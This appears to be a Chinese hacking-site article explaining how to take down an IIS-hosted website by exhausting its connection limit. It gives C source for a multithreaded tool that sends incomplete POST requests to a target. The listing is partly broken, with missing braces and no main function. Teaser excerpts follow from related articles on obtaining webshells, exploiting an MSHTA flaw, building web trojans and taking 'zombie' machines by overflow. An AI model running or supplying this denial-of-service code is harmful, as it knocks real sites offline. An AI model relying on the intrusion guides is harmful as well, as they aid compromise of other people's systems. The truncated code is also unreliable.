利用IIS最大连接数实现网站DOS(图)_漏洞研究

安全中国提示本程序仅做为技术研究之用请勿用于非法用途否则后果自负

最近买了个空间来玩各位勿笑是入门级的虚拟主机偶是穷人啊各种参数都相当低特别是IIS连接数只有100个也就是同时支持100个不同的访问。

这里就出现问题了。如果我一直对该网站进行连接虽然我是同一个人但是IIS却傻乎乎的把每次连接当成不同的人每连接一次就会分配一个session给我当连接超过服务器设置的IIS最大连接数目的时候……呵呵拒绝服务就发生了。

具体的攻击嘛我们当然是利用程序来完成。思路简单就是不断的向网站发HTTP请求直到超过它的最大连接数。正好机器上有以前看了shotgun的《HTTP协议Content Lenth限制漏洞导致拒绝服务攻击》写的测试程序跟今天的要求很相似就拿来改改咯。具体代码如下

#include "winsock.h"

#include "stdio.h"

#include "string.h"

#include "io.h"

#pragma comment(lib,"ws2_32.lib")

#define BUFLEN 1024

#define MAXThreadCount 10 //设置最大线程数

int ThreadCount=0; 

struct mydata

{

 char *ip;

 int port;

};

 

unsigned int resolve(char *name)

{

 struct hostent *he;

 unsigned int ip;

 if((ip=inet_addr(name))==(-1))

 {

 if((he=gethostbyname(name))==0)

 return 0;

 memcpy(&ip,he->h_addr,4);

 }

 return ip;

}

 

DWORD WINAPI Dos(LPVOID lpParam ) 



 mydata *csdn = (mydata*)lpParam;

 struct sockaddr_in server;

 server.sin_family = AF_INET;

 server.sin_port = htons(csdn->port);

 server.sin_addr.s_addr = resolve((char*)csdn->ip);

 if(server.sin_addr.s_addr==0)

 {

 printf("Dont find address %s\n",(char*)csdn->ip);

 exit(0);

 }

 int my;

 char buf[100]="POST / HTTP/1.1\r\nHost: ";

 strcat(buf,(char*)csdn->ip);

 strcat(buf," \r\nContent-Length: 10\r\n\r\n");

 my=socket(PF_INET,SOCK_STREAM,0);

 if(my==INVALID_SOCKET)

 {

 printf("ERROR");

 exit(0);

 }

if(connect(my,(struct sockaddr *) & server,sizeof(server))==SOCKET_ERROR)

 {

 printf("Socket ERROR:%d",GetLastError());

 exit(0);

 }

 if(send(my,buf,strlen(buf),0)==SOCKET_ERROR){printf("ERROR:send fail!");}

 ThreadCount--;

 return 0; 

void thread ( char *a1 , char *a2 , char *a3 )

{

 static mydata tmp;

 tmp.ip = a1;

 tmp.port = atoi(a2);

 DWORD dwThreadId;

 HANDLE hThread; 

 WSADATA ws;

 if (WSAStartup( MAKEWORD(2,2), &ws )!=0)

 {

 printf(" [-] WSAStartup() error\n");

 exit(0);

 }

 hThread = CreateThread( 

 NULL, // no security attributes 

 0, // use default stack size 

 Dos, // thread function 

 &tmp, // argument to thread function 

 0, // use default creation flags 

 &dwThreadId); // returns the thread identifier 

 if (hThread == NULL) 

 printf( "CreateThread failed." ); 

 ThreadCount++;

 Sleep(200); //延时否则CPU会用满……

 CloseHandle(hThread);

时间: 2024-10-30 16:07:53

利用IIS最大连接数实现网站DOS(图)_漏洞研究的相关文章

当备份数据库不能用时.用邮件列表得到WEBSHELL!(图)_漏洞研究

今天上午闲着无聊,刚好一个朋友发过来一个网站的后台管理密码.他要我帮他看看.我说你得到后台了.可以用备份数据库功能得到WEBSHELL啊.你还发过来干嘛.他说后台有数据备份的选项.但是不能用.大家看一下图!  列表得到WEBSHELL!(图)_漏洞研究-数据库备份拿shell">  里面有备份的选项.但是点了之后出现错误!应该是管理员把文件改名了.或者是位置改变了.不能备份数据库,那怎么办,不能白白的浪费这样的一个机会.我就在后台里面到处看了一下.发现可以通过改网站注册用户的邮件地址.我们

MSHTA漏洞为黑客大开远程控制之门(图)_漏洞研究

这是一个可以让黑客欣喜若狂的新漏洞,一旦该漏洞被激活,就会有大量计算机成为黑客手中的肉鸡,被人远程控制不可避免-- 微软的Windows操作系统在进行了短暂的"喘息"后,近日又在攻击爱好者不懈努力下,被成功找出几个高危的系统安全漏洞,而Microsoft Windows MSHTA脚本执行漏洞就是其中的重要一员. 安全公告牌 MSHTA即HTA,此处的MS主要用于强调这是微软的漏洞,HTA全名为HTML Application,就是HTML应用程序,其实只要简单地用"hta&

利用IE Object Data漏洞制做全新网页木马(图)_漏洞研究

原发黑客x档案第8期,版权归杂志所有. 利用Internet Explorer Object Data漏洞制做全新网页木马lcx今年8月20日,微软公布了一个最高严重等级的重要漏洞--Internet Explorer Object数据远程执行漏洞.这对于网页木马爱好者来说可是一件好事,我们可以用这个漏洞来制做一款全新的暂时不会被查杀的木马了.在介绍如何制做这个全新网页木马前我先给大家简单介绍一下该漏洞.一.漏洞描述该漏洞内由eEye Digital Security发现并于8月20号公布的,微

利用DWRCC突破天网防火墙(经验)(图)_漏洞研究

题外音:今天早上,为了逗BBS好友云舒开心,特告知她本人所用服务器之账户及口令,让她看看我的好东东.同时,我和她登录同一台开启3389肉机使用软件登录本人服务器,晕,吓的要死,还好,不是别人,*^_^* 系统环境: 采用windows 2000 professional做为本人所用局域网内网关,当前运行软件,天网4.2.8个人测试版,金山病毒防火墙,Sygate(以下简称服务器) 以下所有的图片都是在局域网内98机器上抓图,本人所用98+windows 2000远程终端服务连接器及其他相关软件(

黑客如何利用Ms05002溢出找“肉鸡” (图)_漏洞研究

溢出攻击永远是安全界中,不可忽视的角色.而如今也正是肉鸡短缺的年代,能掌握一门最新的Ms05002溢出,必定会让你有"惊人"的收获.至于熟练的溢出如何炼成?具体方法请见下文所示! 实施方法:通过Ms05002攻击工具,溢出反弹IP.反弹端口,会生成含有木马性质的文件.然后将这个产生的文件,以QQ传输的形式发给受害者观看,或者将其上传到自己的主页空间,引诱其他人访问.最后执行NC瑞士军刀,监听本机端口,收取已经运行产生文件的主机. 步骤1.首先从网上下载Ms05002溢出工具,释放到比较

注入过程中遇到DB_OWNER的想法(图)_漏洞研究

首先先声明这个文章是写给菜鸟朋友看的     .现在注入横飞!工具一大堆,过去手工注入的时代已经不复存在!代之的是NBSI HDSI 啊D注入工具..等等.也是广大菜鸟的最爱了.即使什么也不会.什么也不懂.只需要点几下鼠标.存在注入漏洞的网站密码就出来了.接下来就是扫扫后台.传传马.就完了.就这样简单.碰到SA权限的话就.直接建立号开3389或者上传WEBSHELL.是内网就映射.是DB_OWNER权限的话呢就考虑用备份差异.但是WEB和数据库不在同一台服务器该怎么搞呢?其实也不一定是搞不定.除

渗透技术一瞥(图)_漏洞研究

渗透是指入侵者直接用被入侵对象原有的功能来完成的入侵,它可以使用各种方法进行.无论是个人用户.数据库管理员还是网站管理员,要构造一个安全的网站论坛.数据库服务器以及安全的SQL语句脚本,了解渗透技术潜在的危害都非常有必要. 很多用户都有这样一种感觉:计算机信息安全技术或者黑客关心的一些东西都比较高深,其实不然,比如渗透技术,可能仅仅是这个专业的技术名词就已经让你有点眩晕了,但是你知道吗,在日常的计算机应用中,你常常会与渗透技术擦肩而过. 让我们举一个小例子来做个简单的说明:如果我告诉你"' or

图片引发的溢出危机(图)_漏洞研究

就在刚迈入2006年之际,Windows系统出现了一个严重的漏洞,这就是Microsoft Windows图形渲染引擎wmf格式代码漏洞(ms0601).这个漏洞出现在Windows的图形渲染引擎中,黑客可以构造恶意的wmf文件,引诱其他用户打开,当系统没有更新过wmf补丁时,将会执行黑客事先设置好的恶意代码,获取系统的最高权限,从而完全听命于黑客.就在漏洞公布几天后,网络上使用wmf漏洞进行传播的病毒.攻击事件不断,直至今日,网上仍然充斥着无数利用wmf漏洞的攻击.本文将向大家介绍有关wmf漏

从广告邮件到肉鸡成群(图)_漏洞研究

我的私人信箱多次接到化妆品广告邮件,感觉不像是种毒的,于是点开连接去看看,原来是一个卖化妆品的商务网站.看上去较漂亮,就是不知安全性如何?以前注意过天意商务网,但这个较陌生,不知是什么系统(如图1所示). 图1     习惯性地看看有无上传之处,居然没有发现有上传图片或其它东东的地方.不死心,注册一个用户,仍然没有发现可以上传或发表文章之处.再看看有无注入漏洞,在网址后面加上"'",提示"请勿输入非法字符",说明已做了防注入处理.不甘心啊!再加上"and